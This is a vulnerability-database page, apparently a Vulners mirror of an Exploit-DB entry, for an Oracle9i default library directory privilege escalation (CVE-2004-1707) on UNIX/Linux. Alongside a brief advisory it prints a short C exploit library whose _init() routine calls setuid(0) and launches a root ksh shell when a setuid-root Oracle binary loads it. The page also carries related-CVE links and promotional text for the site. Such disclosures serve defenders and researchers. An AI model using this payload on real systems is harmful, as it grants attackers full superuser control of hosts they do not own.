Lucene search
+L

Oracle9i Database - Default Library Directory Privilege Escalation

🗓️ 30 Jul 2004 00:00:00Reported by Juan Manuel Pascual EscribáType 
exploitdb
 exploitdb
🔗 www.exploit-db.com👁 41 Views

Oracle9i Database vulnerability allows privilege escalation on UNIX/Linux systems via library manipulation.

Related
Code
ReporterTitlePublishedViews
Family
cve
CVE
CVE-2004-1707
26 Feb 200505:00
cve
cvelist
Cvelist
CVE-2004-1707
26 Feb 200505:00
cvelist
nvd
NVD
CVE-2004-1707
30 Jul 200404:00
nvd
nessus
Tenable Nessus
Oracle Application Server Multiple Vulnerabilities
24 Jan 201200:00
nessus
source: https://www.securityfocus.com/bid/10829/info

Oracle database implementations are reportedly prone to a default library directory privilege escalation vulnerability. This issue arises due to a default configuration error that will permit the attacker to replace libraries required by setuid root applications with arbitrary code.

This issue would allow an Oracle software owner to execute code as the superuser, taking control of the entire system.

It should be noted that this vulnerability only affects Oracle on UNIX/Linux platforms.

#include
#include

_init() {
printf("en el _init()\n");
printf("Con PID=%i y EUID=%i",getpid(),getuid());
setuid(0);
system("/usr/bin/ksh");
printf("Saliendo del Init()\n");
}

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

24 Jan 2013 00:00Current
5.8Medium risk
Vulners AI Score5.8
CVSS 27.2
EPSS0.02572
41